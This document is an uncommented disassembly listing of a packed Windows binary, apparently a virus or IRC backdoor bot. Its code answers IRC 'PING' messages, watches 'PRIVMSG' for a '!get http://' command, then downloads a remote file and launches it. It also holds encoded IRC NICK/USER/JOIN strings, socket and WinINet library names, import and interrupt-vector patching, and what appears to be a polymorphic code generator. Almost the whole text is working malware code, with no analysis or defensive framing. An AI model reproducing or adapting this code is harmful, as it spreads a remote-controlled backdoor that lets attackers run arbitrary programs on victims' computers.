dd 103E62h, 4C25Dh, 0E855h, 815D0000h, 101B53EDh, 8DFF6A00h
dd 101B1E95h, 0CD525000h, 2A002420h, 0CC48300h, 6485C766h
dd 0CD00101Bh, 6685C720h, 2400101Bh, 5D002A00h, 581A6AC3h
dd 9E8h, 61428D00h, 75C9FEAAh, 9569C3F0h, 103F7Ch, 8088405h
dd 7C958942h, 0F700103Fh, 0E855C3E2h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101BADh
mov ebx, [ebp+103F80h]
cmp dword ptr [esp+8], 0
jz loc_31438CD5
sub esp, 208h
push esp
push 104h
call dword ptr [ebp+103EB6h]
mov edi, esp
lea eax, [esp+104h]
push eax
push 0
call near ptr loc_31438C42+1
push esi
push edx
push edx
loc_31438C42: ; CODE XREF: UPX2:31438C3A�p
add [edi-1], dl
xchg eax, ebp
mov dl, 3Eh
adc [eax], al
xor ecx, ecx
lea edx, [edi+104h]
push ecx
push ecx
push 2
push ecx
push 1
push 40000000h
push edx
call dword ptr [ebp+103E7Eh]
xchg eax, esi
test esi, esi
jz short loc_31438CC5
loc_31438C6A: ; CODE XREF: UPX2:31438C98�j
push eax
push esp
push 104h
push edi
push dword ptr [esp+220h]
call dword ptr [ebp+103F5Eh]
pop ecx
test eax, eax
jz short loc_31438C9A
jecxz short loc_31438C9A
push eax
mov edx, esp
push 0
push edx
push ecx
push edi
push esi
call dword ptr [ebp+103EF6h]
pop ecx
test eax, eax
jnz short loc_31438C6A
loc_31438C9A: ; CODE XREF: UPX2:31438C82�j
; UPX2:31438C84�j
push esi
call dword ptr [ebp+103E62h]
lea edx, [edi+44h]
push edx
push edi
push 44h
pop eax
lea edx, [edi+104h]
stosd
xor eax, eax
push 10h
pop ecx
rep stosd
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push edx
call dword ptr [ebp+103E86h]
loc_31438CC5: ; CODE XREF: UPX2:31438C68�j
add esp, 208h
push dword ptr [esp+8]
call dword ptr [ebp+103F4Eh]
loc_31438CD5: ; CODE XREF: UPX2:31438C16�j
push ebx
call dword ptr [ebp+103F4Eh]
pop ebp
retn 4
; ---------------------------------------------------------------------------
cmp byte ptr [esi], 0Ah
jnz short loc_31438CE6
inc esi
loc_31438CE6: ; CODE XREF: UPX2:31438CE3�j
mov ecx, [ebp+10158Ch]
jecxz short loc_31438D07
lea edx, [ebp+101000h]
add edx, ecx
push esi
call edx
test al, al
js loc_31438E20
jz loc_31438E17
loc_31438D07: ; CODE XREF: UPX2:31438CEC�j
cmp byte ptr [esi], 3Ah
jnz short loc_31438D1C
loc_31438D0C: ; CODE XREF: UPX2:31438D19�j
inc esi
cmp byte ptr [esi], 0
jz loc_31438E17
cmp byte ptr [esi], 20h
jnz short loc_31438D0C
inc esi
loc_31438D1C: ; CODE XREF: UPX2:31438D0A�j
cmp dword ptr [esi], 474E4950h
jnz short loc_31438D66
mov ecx, edi
mov byte ptr [esi+1], 4Fh
sub ecx, esi
push ecx
push 0
push ecx
push esi
push ebx
call dword ptr [ebp+103F46h]
pop ecx
cmp eax, ecx
jnz loc_31438E20
lea eax, [ebp+101EA3h]
push 0
push 0Ch
push eax
push ebx
call dword ptr [ebp+103F46h]
cmp eax, 0Ch
jnz loc_31438E20
jmp loc_31438E17
; ---------------------------------------------------------------------------
loc_31438D66: ; CODE XREF: UPX2:31438D22�j
cmp dword ptr [esi], 56495250h
jnz loc_31438E17
add esi, 8
loc_31438D75: ; CODE XREF: UPX2:31438D80�j
lodsb
cmp al, 0Dh
jz loc_31438E17
cmp al, 20h
jnz short loc_31438D75
lodsb
cmp al, 3Ah
jnz loc_31438E17
lodsd
or eax, 20202020h
cmp eax, 74656721h
jnz short loc_31438E17
lodsb
cmp al, 20h
jnz short loc_31438E19
cmp dword ptr [esi-1], 74746820h
jnz short loc_31438E17
cmp dword ptr [esi+3], 2F2F3A70h
jnz short loc_31438E17
mov byte ptr [edi-1], 0
rdtsc
mov edx, 2710h
mul edx
push edx
call dword ptr [ebp+103EE6h]
xor eax, eax
push eax
push eax
push eax
push eax
call near ptr loc_31438DD5+2
inc esp
outsd
ja short loc_31438E40
insb
outsd
popa
loc_31438DD5: ; CODE XREF: UPX2:31438DC9�p
db 64h
add bh, bh
xchg eax, ebp
push esi
aas
adc [eax], al
test eax, eax
jz short loc_31438E17
xor ecx, ecx
mov [ebp+103F80h], eax
push ecx
push 80000200h
push ecx
push ecx
push esi
push eax
call dword ptr [ebp+103F5Ah]
lea edx, [ebp+101BA7h]
push eax
xor ecx, ecx
push esp
push ecx
push eax
push edx
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
loc_31438E17: ; CODE XREF: UPX2:31438D01�j
; UPX2:31438D10�j ...
clc
retn
; ---------------------------------------------------------------------------
loc_31438E19: ; CODE XREF: UPX2:31438D9B�j
or byte ptr [ebp+10157Fh], 1
loc_31438E20: ; CODE XREF: UPX2:31438CFB�j
; UPX2:31438D3B�j ...
stc
retn
; ---------------------------------------------------------------------------
push 1
push 1
push dword ptr [ebx]
push dword ptr [ebx+4]
call dword ptr ds:5A74C085h ; CODE XREF: UPX2:31438F91�p
xor ebx, ebx
mov edx, eax
mov bl, 0Bh
add edx, [eax+3Ch]
lea esi, [ebp+101DCBh]
loc_31438E40: ; CODE XREF: UPX2:31438DD0�j
mov edi, [edx+10Ch]
mov ecx, [edx+108h]
add edi, eax
sub ecx, ebx
loc_31438E50: ; CODE XREF: UPX2:31438E59�j
pusha
mov ecx, ebx
repe cmpsb
popa
jz short loc_31438E5D
inc edi
loop loc_31438E50
jmp short locret_31438E8B
; ---------------------------------------------------------------------------
loc_31438E5D: ; CODE XREF: UPX2:31438E56�j
add edi, 0Fh
push ebx
mov ecx, esp
push edi
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push 0FFFFFFFFh
call dword ptr [ebp+103F22h]
mov ecx, [ebp+103E96h]
add esp, 0Ch
sub ecx, edi
sub ecx, 7
mov dword ptr [edi], 0E8006Ah
mov [edi+3], ecx
locret_31438E8B: ; CODE XREF: UPX2:31438E5B�j
retn
; ---------------------------------------------------------------------------
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',0
aTargethost db 'TargetHost',0
dw 2
dd 72555000h, 7270D08Fh, 6D69786Fh, 6372692Eh, 616C6167h
dd 702E7978h, 494E006Ch, 67204B43h, 776C627Ah, 0A616B70h
dd 52455355h, 4F4A7420h, 26204E49h, 74726976h, 0E8550A75h
dd 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101EB5h
mov byte ptr [ebp+10157Fh], 0
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz short loc_31438F61
push 1Eh
mov esi, [ebp+103E72h]
pop ecx
loc_31438F2E: ; CODE XREF: UPX2:loc_31438F5D�j
lodsb
cmp al, 2Eh
jnz short loc_31438F5D
cmp word ptr [esi], 1DFFh
jnz short loc_31438F5D
lea edi, [ebp+103F76h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+1038ECh]
pop dword ptr [ebp+103912h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_31438F5D: ; CODE XREF: UPX2:31438F31�j
; UPX2:31438F38�j
loop loc_31438F2E
jmp short loc_31438FB1
; ---------------------------------------------------------------------------
loc_31438F61: ; CODE XREF: UPX2:31438F23�j
call near ptr dword_31438608+47Fh
cmp dword ptr [esp+8], 4
jnz short loc_31438FB1
call near ptr loc_31438F79+1
push ebx
inc esi
inc ebx
db 2Eh
inc esp
dec esp
dec esp
loc_31438F79: ; CODE XREF: UPX2:31438F6D�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add [ebx], cl
sal byte ptr [ebp+ecx-6Dh], 6Ah
add dl, [ebx-1]
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
call eax
xchg eax, ebx
call near ptr loc_31438E2B+2
call near ptr loc_31438FA5+1
push ebx
inc esi
inc ebx
pop edi
dec edi
push ebx
db 2Eh
inc esp
dec esp
dec esp
loc_31438FA5: ; CODE XREF: UPX2:31438F96�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
loc_31438FAD: ; CODE XREF: UPX2:loc_31438FAD�j
jl short loc_31438FAD
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
; ---------------------------------------------------------------------------
loc_31438FB1: ; CODE XREF: UPX2:31438F5F�j
; UPX2:31438F6B�j
call sub_314385B6
dec dword ptr [ebp+1012D4h]
xor ecx, ecx
lea eax, [ebp+104324h]
push ecx
push ecx
push ecx
push ecx
push eax
push ecx
push ecx
push ecx
call dword ptr [ebp+103EC2h]
call near ptr loc_31438FE1+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31438FE1: ; CODE XREF: UPX2:31438FD2�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
db 0
dd 70737700h, 746E6972h, 50004166h, 3E6E95FFh, 85890010h
dd 103E76h, 8D8D310Fh, 101985h, 3F7C8589h, 0FF510010h
dd 103EC695h, 4689300h, 8D000000h, 101992B5h, 0BD8D5900h
dd 103F62h, 0FFF5C2E8h, 85C766FFh, 101E75h, 0A5835000h
dd 101E77h, 35958D00h, 5000101Eh, 6A016A54h, 2685200h
dd 0FF800000h, 103F6695h, 5AC08500h, 8D8D2275h, 101E68h
dd 8D066A52h, 101E75B5h, 50565400h, 0FF525150h, 103F6A95h
dd 95FF5800h, 103F62h, 418385C6h, 0E8000010h, 0Ch, 434F5357h
dd 2E32334Bh, 4C4C44h, 3EC695FFh, 68930010h, 7, 18E9B58Dh
dd 8D590010h, 103F32BDh, 0F53DE800h, 0CE8FFFFh, 57000000h
dd 4E494E49h, 442E5445h, 0FF004C4Ch, 103EC695h, 0FC08500h
dd 23584h, 5689300h, 8D000000h, 101927B5h, 0BD8D5900h
dd 103F4Eh, 0FFF506E8h, 52BD83FFh, 103Fh, 210840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 103F32h, 190C481h, 8B500000h
dd 52006AD4h, 3F5295FFh, 0C0850010h, 680D7559h, 1388h
dd 3EE695FFh, 0E2EB0010h, 1E77BD83h, 75000010h, 7B858D29h
dd 5000101Eh, 3F3E95FFh, 0C0850010h, 189840Fh, 408B0000h
dd 0FF008B0Ch, 77858F30h, 0C600101Eh, 10418385h, 6A0100h
dd 26A016Ah, 3F4A95FFh, 0F8830010h, 60840FFFh, 93000001h
dd 1E73958Dh, 106A0010h, 95FF5352h, 103F3Ah, 850FC085h
dd 140h, 1E94BD8Dh, 8B10010h, 0FFFA3CE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 0BE95FF54h, 8D00103Eh, 101EA2BDh, 0E801B100h
dd 0FFFFFA1Dh, 1E8F958Dh, 6A0010h, 1468h, 0FF535200h, 103F4695h
dd 24448D00h, 24958D14h, 50001043h, 8B0AB60Fh, 0C1142444h
dd 4A0208E0h, 24A1201h, 0B034A12h, 80082444h, 0E0C10FE1h
dd 440B5108h, 32FF1024h, 84BD8D50h, 0E800103Fh, 1Ch, 78362E25h
dd 2E202E20h, 25253A20h, 78382E25h, 25207825h, 4F4A0A73h
dd 204E49h, 7695FF57h, 8100103Eh, 0ACC4h, 50006A00h, 95FF5357h
dd 103F46h, 15988D8Bh, 6A0010h, 0C96B1BE3h, 5E8510Dh, 26000000h
dd 0A6425h, 7695FF57h, 8300103Eh, 0EB500CC4h, 7680Bh, 0BD8D0000h
dd 101EA8h, 95FF5357h, 103F46h, 547EC085h, 3F84B58Dh, 0A5830010h
dd 101598h, 838D8D00h, 2B001041h, 51006ACEh, 95FF5356h
dd 103F42h, 7E00F883h, 0FE8B912Fh, 3F84B58Dh, 0DB00010h
dd 1075AEF2h, 0FA2AE860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 3F84BD8Dh, 0A4F30010h, 0B9EBF787h, 3695FF53h
dd 8000103Fh, 10157FBDh, 2A740100h, 753068h, 0E695FF00h
dd 8000103Eh, 104183BDh, 11740000h, 1E7785C7h, 10h, 85C60000h
dd 104183h, 0FE08E900h, 85C7FFFFh, 101588h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 29216574h, 3210A614h
dd 0E5403752h, 0A827B1FAh, 484CA2A1h, 94403752h, 5C86E151h
dd 88C26CCCh, 0B98F9087h, 52658000h, 0D8B8B3h, 14h dup(0)
dd 8F000000h, 60C76898h, 42F4A583h, 83000010h, 1042F8A5h
; CODE XREF: UPX2:31439FF7�p
; UPX2:3143A034�p ...
dd 0B70F0000h, 538D1443h, 4BB70F18h, 8BD00306h, 2B242444h
dd 19720C42h, 7308423Bh, 14428B14h, 890C422Bh, 1042F495h
dd 0F8858900h, 0EB001042h, 28C28305h, 0C261D9E2h, 85880004h
dd 102467h, 64E8h, 206800h, 858D0000h, 102394h, 74183959h
dd 4C0830Ch, 85FFF7E2h, 1042D0h, 3D9F7C3h, 1024678Dh, 0FF10E300h
dd 8FFC70h, 0E204E883h, 949D89F6h, 83001023h, 574003Ah
dd 7203322Bh, 0FC4E8D10h, 835E5B58h, 474003Ah, 3EB32FFh
dd 0E81072FFh, 0FFFFFF57h, 8D2BCE2Bh, 1042F8h, 344B0358h
dd 0D4858FC3h, 0C7001042h, 1042D085h, 0
dd 3CE800h, 858B0000h, 1042D0h, 0FFF6A9E8h, 18E8FFh, 0BD830000h
dd 1042D0h, 89087500h, 1024109Dh, 0FF9CEB00h, 1042D08Dh
dd 858FC300h, 1042D4h, 42D09589h, 3E80010h, 33000000h
dd 938BC3C9h, 80h, 0FEEDE852h, 9503FFFFh, 1042F8h, 7A83D603h
dd 840F000Ch, 107h, 107A83h, 0FD840Fh, 428B0000h, 0C8E8500Ch
dd 3FFFFFEh, 1042F885h, 50C60300h, 0F980088Ah, 80197400h
dd 3742EF9h, 8BF1EB40h, 0E1810148h, 0DFDFDFDFh, 4C44F981h
dd 0EC75004Ch, 83C82B59h, 8F0FFAF9h, 0B7h, 0FE788166h
dd 850F3233h, 0ABh, 3A8356h, 4A8B0575h, 8B02EB10h, 51F1030Ah
dd 0FFFE72E8h, 0F8B503FFh, 0AD001042h, 0FB78C085h, 84840Fh
dd 0B5FF0000h, 1042F8h, 0FE55E850h, 8503FFFFh, 1042F8h
dd 42F8858Fh, 4030010h, 0C0835324h, 0FDB3302h, 12E308B6h
dd 5320C980h, 42424C1h, 29241C29h, 405B240Ch, 0FB81E9EBh
dd 0DDBBD70Fh, 0FB813E74h, 0DB6E45A8h, 0FB813674h, 0FFA13B59h
dd 0FB812E74h, 0ACB522D6h, 0FB812674h, 0F358E993h, 0FB811E74h
dd 0F358E97Dh, 0FB811674h, 0E1253F46h, 0FB810E74h, 0E1253F30h
dd 95FF0674h, 1042D4h, 0FF71E95Bh, 835EFFFFh, 0EFE914C2h
dd 0C3FFFFFEh, 58046A01h, 0FFF549E8h, 419588FFh, 66001026h
dd 21831B8h, 3E4C0E2h, 0AB66E202h, 0E858066Ah, 0FFFFF52Eh
dd 8708C283h, 58056AD1h, 0FFF521E8h, 3FA80FFh, 50B00B73h
dd 26418502h, 0EBAA0010h, 58686A27h, 3FA80AAh, 11B01875h
dd 0FFF501E8h, 1B8FFh, 0D2840000h, 0E0D10D74h, 0F6EBCAFEh
dd 0B805EBh, 0AB800000h, 8DC3BFE2h, 1039CC95h, 0F7D72B00h
dd 85F7C3DAh, 1039C0h, 10000000h, 0C1C0950Fh, 85F60BE0h
dd 1039BEh, 66067501h, 0EB25890Dh, 0BE85F613h, 2001039h
dd 0D660675h, 4EB2531h, 25010D66h, 0BCE8AB66h, 8BFFFFFFh
dd 95893443h, 1042E8h, 85F7C3ABh, 1039C0h, 10000000h, 4C0950Fh
dd 9CE8AABCh, 89FFFFFFh, 1042EC95h, 0BE85F600h, 1001039h
dd 310F0475h, 0C02B02EBh, 85F7C3ABh, 1039C0h, 10000000h
dd 858A2774h, 1039BAh, 660BE0C1h, 66458B0Dh, 0AAF8B0ABh
dd 39BA858Ah, 0E0C10010h, 6467051Bh, 33AB0689h, 0EBAB66C0h
dd 8F64B812h, 8AAB0005h, 1039BA85h, 0C1580400h, 0C3AB18E0h
dd 279C85C6h, 0EB090010h, 0EBFCB025h, 0EBB86620h, 0EBAB6600h
dd 58046A19h, 0FFF409E8h, 0D2048DFFh, 6608E0C1h, 66C08905h
dd 0B003EBABh, 1B6AAA90h, 0F3F0E858h, 8580FFFFh, 10279Ch
dd 8FA8006h, 0D2842F73h, 2 dup(0CAFEC374h), 0CAFEC774h
dd 0CAFED974h, 0CAFE0C74h, 0CAFE0F74h, 0F9B00F74h, 87B0CBEBh
dd 0EBDBB0AAh, 0EBF5B0C4h, 0EBF8B0C0h, 85F7C3BCh, 1039C0h
dd 2000h, 27586B0h, 4F8D0404h, 0B8A58AFEh, 66001039h, 5FC80ABh
dd 0B00775h, 40FF4F80h, 0FF62E8AAh, 85F7FFFFh, 1039C0h
dd 4000h, 3166B866h, 29B40275h, 18B0AB66h, 39BA850Ah, 0E0C00010h
dd 3DE8AA03h, 0B0FFFFFFh, 0C085F788h, 1039h, 75000080h
dd 8A86B002h, 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h
dd 0C3AA40FFh, 39CCBD8Dh, 0DE80010h, 0F7FFFFFFh, 1039C085h
dd 40000000h, 0B0037400h, 85F7AA60h, 1039C0h, 10000000h
db 74h, 7, 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dd 0F020000h, 0F084h, 0AAE8B000h, 0D8BD89ABh, 0E8001042h
dd 0FFFFFECCh, 0ABAAE8B0h, 42DCBD89h, 0BDE80010h, 0F7FFFFFEh
dd 1039C085h, 300h, 0F71A7400h, 1039C085h, 0
dd 0E80A7402h, 0FFFFFE2Eh, 0FFFE9BE8h, 0AAE9B0FFh, 0D8858BABh
dd 8B001042h, 89C82BCFh, 1042E0BDh, 0FC488900h, 0FF6467B8h
dd 0C033AB36h, 85F7AB66h, 1039C0h, 3, 85F61374h, 1039BEh
dd 0E80A7480h, 0FFFFFDAAh, 0FFFE5BE8h, 6467B8FFh, 33AB2689h
dd 0F7AB66C0h, 1039C085h, 300h, 0F65A7400h, 1039BE85h
dd 0A758000h, 0FFFD81E8h, 0FE32E8FFh, 2E8FFFFh, 0B0FFFFFDh
dd 0FB14E820h, 39E3FFFFh, 15FFB866h, 0AB91AB66h, 39C0958Bh
dd 0D2F70010h, 3C2F7h, 14750000h, 0FFFCDCE8h, 0E81FB0FFh
dd 0FFFFFAEEh, 15FFB866h, 0AB91AB66h, 858BCF8Bh, 1042E0h
dd 4889C82Bh, 0C085F7FCh, 3001039h, 74000000h, 0C085F738h
dd 1039h, 740C0000h, 0C085F72Ch, 1039h, 75020000h, 0FDC2E80Ah
dd 4BE8FFFFh, 0F7FFFFFDh, 1039C085h, 0
dd 0E80A7408h, 0FFFFFDACh, 0FFFD61E8h, 0C085F7FFh, 4001039h
dd 74000000h, 0FD96E817h, 29B8FFFFh, 0ABC8FEC0h, 74C008B8h
dd 75B8AB04h, 0AB67EBF8h, 0FFFD7FE8h, 0C085F7FFh, 8001039h
dd 75000000h, 0BEBD8072h, 1039h, 65E86974h, 0B8FFFFFDh
dd 0C9291829h, 39BAA50Ah, 0E4C00010h, 0BAA50A03h, 0AB001039h
dd 0FFFD4BE8h, 0AAB1B0FFh, 39BE858Ah, 0E8AA0010h, 0FFFFFD3Ch
dd 0BA85B60Fh, 8D001039h, 4004C004h, 0B008E0C1h, 0B0AB668Dh
dd 0E857AA01h, 0FFFFFD20h, 66243C29h, 59FBE2B8h, 39C085F7h
dd 100010h, 7740000h, 66AA49B0h, 2FA75B8h, 0E8AB66E1h
dd 0FFFFFCFCh, 33AAE8B0h, 0BD89ABC0h, 1042C4h, 39C085F7h
dd 200010h, 3B750000h, 0FCDEE857h, 85F7FFFFh, 1039C0h
dd 80000000h, 0BD891874h, 1042F0h, 0FFFD39E8h, 0FCC2E8FFh
dd 0C3B0FFFFh, 0FCBAE8AAh, 8B5AFFFFh, 2B58B0CFh, 0B8850ACAh
dd 89001039h, 0E8AAFC4Ah, 0FFFFFCA4h, 0C081B866h, 39C085F7h
dd 400010h, 3740000h, 0A28C480h, 1039B8A5h, 89AB6600h
dd 1042C8BDh, 85F7AB00h, 1039C0h, 40000000h, 50B00975h
dd 39B88502h, 0F7AA0010h, 1039C085h, 8000h, 0B00B7500h
dd 0B9850AB8h, 0AA001039h, 0B8663DEBh, 85F71831h, 1039C0h
dd 100h, 29B00274h, 39B9A50Ah, 0E4C00010h, 0B9A50A03h
dd 66001039h, 81B866ABh, 0C085F7F0h, 1039h, 75000002h
dd 0AC8B402h, 1039B9A5h, 89AB6600h, 1042E4BDh, 29CCB800h
dd 0F7AB0000h, 1039C085h, 800h, 0E8717400h, 0FFFFFBFCh
dd 39C085F7h, 4000010h, 0B750000h, 850AB8B0h, 1039BAh
dd 0F74DEBAAh, 1039C085h, 80000h, 66117500h, 0AE083B8h
dd 1039BAA5h, 33AB6600h, 15EBAAC0h, 1829B866h, 39BAA50Ah
dd 0E4C00010h, 0BAA50A03h, 66001039h, 0C085F7ABh, 1039h
dd 66000010h, 74C081B8h, 8C48003h, 39BAA50Ah, 0AB660010h
dd 0BE85B60Fh, 0AB001039h, 0FFFB8BE8h, 0C085F7FFh, 1039h
dd 74400000h, 250B00Eh, 1039B885h, 71E8AA00h, 8DFFFFFBh
dd 8D89FE4Fh, 1042CCh, 39C085F7h, 10h, 17748000h, 8BAAE8B0h
dd 1042F085h, 83C72B00h, 89AB04E8h, 1042F0BDh, 0E805EB00h
dd 0FFFFFBB2h, 0FFFB3BE8h, 0C085F7FFh, 1039h, 75000100h
dd 0A40B00Bh, 1039B885h, 0FEBAA00h, 0C083B866h, 39B8A50Ah
dd 0AB660010h, 0F7AA01B0h, 1039C085h, 2000000h, 0F72F7500h
dd 1039C085h, 4000000h, 0B01A7500h, 0BA850AC0h, 8A001039h
dd 1039BFA5h, 10E0C100h, 8166B866h, 0EB00B0ABh, 0A40B008h
dd 1039BA85h, 85F7AA00h, 1039C0h, 80000h, 0B8661075h, 0A50AE883h
dd 1039B9h, 1B0AB66h, 48B008EBh, 39B9850Ah, 0E8AA0010h
dd 0FFFFFAB0h, 39C085F7h, 10h, 75B10010h, 0B8662575h, 0A50AF883h
dd 1039B9h, 0C033AB66h, 0CCBD29AAh, 0F7001042h, 1039C085h
dd 20000000h, 0B11F7500h, 661BEB77h, 0A1809B8h, 1039B9A5h
dd 3E4C000h, 39B9A50Ah, 0AB660010h, 42CCBD29h, 0C18A0010h
dd 42CCA58Ah, 0AB660010h, 850258B0h, 1039B8h, 0FA4AE8AAh
dd 85F7FFFFh, 1039C0h, 2000003h, 85F72C74h, 1039C0h, 8000000h
dd 85F72075h, 1039C0h, 6000000h, 0AFE80A75h, 0E8FFFFF9h
dd 0FFFFFA1Ch, 0FFF9D1E8h, 0FA12E8FFh, 85F7FFFFh, 1039C0h
dd 10000000h, 0C9B00874h, 0F9FEE8AAh, 85F7FFFFh, 1039C0h
dd 400000h, 7B02A74h, 39B8852Ah, 0E0C10010h, 8890D1Ah
dd 0A5020024h, 1039B8h, 8003E4C0h, 0E8AB04C4h, 0FFFFF9D0h
dd 0E8AA61B0h, 0FFFFF9C8h, 0E0FFB866h, 39B8A50Ah, 0AB660010h
dd 0FFF9B7E8h, 0C085F7FFh, 20001039h, 74000000h, 0C085F76Fh
dd 1039h, 74800000h, 8BC78B1Fh, 1042F08Dh, 89C12B00h, 0FFE8FC41h
dd 0E8FFFFF9h, 0FFFFF988h, 0E8AAC3B0h, 0FFFFF980h, 8D8BC78Bh
dd 1042C4h, 4189C12Bh, 0A58B0FCh, 1039B885h, 65E8AA00h
dd 0F7FFFFF9h, 1039C085h, 80000000h, 660C7400h, 0AC350B8h
dd 1039B885h, 660AEB00h, 0AE0FFB8h, 1039B8A5h, 0E8AB6600h
dd 0FFFFF93Ch, 39C085F7h, 30010h, 5F740200h, 858BCF8Bh
dd 1042DCh, 4889C82Bh, 0F7C933FCh, 1039C085h, 0
dd 8D0E7501h, 1039B885h
db 0
; ---------------------------------------------------------------------------
loc_31439EB5: ; CODE XREF: UPX2:31439EBB�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31439EB5
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31439ED2
mov ax, 0C031h
stosw
loc_31439ED2: ; CODE XREF: UPX2:31439ECA�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31439EEB
mov ax, 0C031h
stosw
loc_31439EEB: ; CODE XREF: UPX2:31439EE3�j
mov al, 0C3h
stosb
; ---------------------------------------------------------------------------
dw 0D1E8h
db 0F8h ;
db 2 dup(0FFh), 8Dh
db 85h ;
align 2
dw 1039h
db 0
; ---------------------------------------------------------------------------
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_31439F0B
push edi
sub edi, eax
pop eax
jmp short loc_31439F24
; ---------------------------------------------------------------------------
loc_31439F0B: ; CODE XREF: UPX2:31439F03�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31439F24: ; CODE XREF: UPX2:31439F09�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_31439F44
neg eax
loc_31439F44: ; CODE XREF: UPX2:31439F40�j
stosd
retn 4
; ---------------------------------------------------------------------------
db 56h ; V
db 57h, 83h, 0BDh
db 0
db 43h, 10h, 0
db 0
db 0Fh, 84h, 0D9h
db 1
db 2 dup(0), 0E8h
db 0Dh
align 4
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 0FFh, 95h, 0AEh
db 3Eh ; >
db 10h, 0, 89h
db 85h ;
db 14h, 43h, 10h
db 0
db 53h, 8Bh, 58h
db 3Ch ; <
db 3, 0D8h, 0FFh
db 73h ; s
db 28h, 8Bh, 43h
db 34h ; 4
db 0E8h, 0E5h, 0F4h
db 0FFh
db 0FFh, 8Bh, 95h
db 0F4h ;
db 42h, 10h, 0
db 5Bh ; [
db 3, 42h, 0Ch
db 89h ;
db 85h, 18h, 43h
db 10h
align 2
dw 4203h
db 8
db 89h, 85h, 1Ch
db 43h ; C
db 10h, 0, 8Bh
db 73h ; s
db 28h, 0FFh, 0B3h
db 80h ;
align 4
db 0E8h ;
db 0BEh, 0F4h, 0FFh
db 0FFh
db 8Bh, 0BDh, 0F4h
db 42h ; B
db 10h, 0, 56h
db 0E8h ;
db 0B2h, 0F4h, 0FFh
db 0FFh
db 8Bh, 95h, 0F4h
db 42h ; B
db 10h, 0, 8Bh
db 4Ah ; J
db 8, 3, 4Ah
db 0Ch
db 2Bh, 0CEh, 83h
db 0E9h ;
db 5, 0Fh, 88h
db 60h ; `
db 1, 2 dup(0)
db 0Fh
db 84h, 5Ah, 1
db 0
align 2
dw 0B503h
db 0F8h ;
db 42h, 10h, 0
db 3
db 0B5h, 0B4h, 42h
db 10h
align 2
; START OF FUNCTION CHUNK FOR sub_3143A101
loc_31439FE2: ; CODE XREF: sub_3143A101+29�j
lodsb
cmp al, 0E8h
; END OF FUNCTION CHUNK FOR sub_3143A101
jnz loc_3143A08D
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_31439464+7
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_3143A010
cmp eax, [edi+0Ch]
jnb loc_3143A129
jmp short loc_3143A01C
; ---------------------------------------------------------------------------
loc_3143A010: ; CODE XREF: UPX2:3143A003�j
cmp [ebp+1042F4h], edx
jnz loc_3143A129
loc_3143A01C: ; CODE XREF: UPX2:3143A00E�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_3143A129
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_31439464+7
cmp [ebp+1042F4h], edi
jnz loc_3143A129
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3143A129
cmp eax, [edi+8]
jnb loc_3143A129
; START OF FUNCTION CHUNK FOR sub_3143A101
loc_3143A065: ; CODE XREF: sub_3143A101+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_3143A13F
jmp loc_3143A129
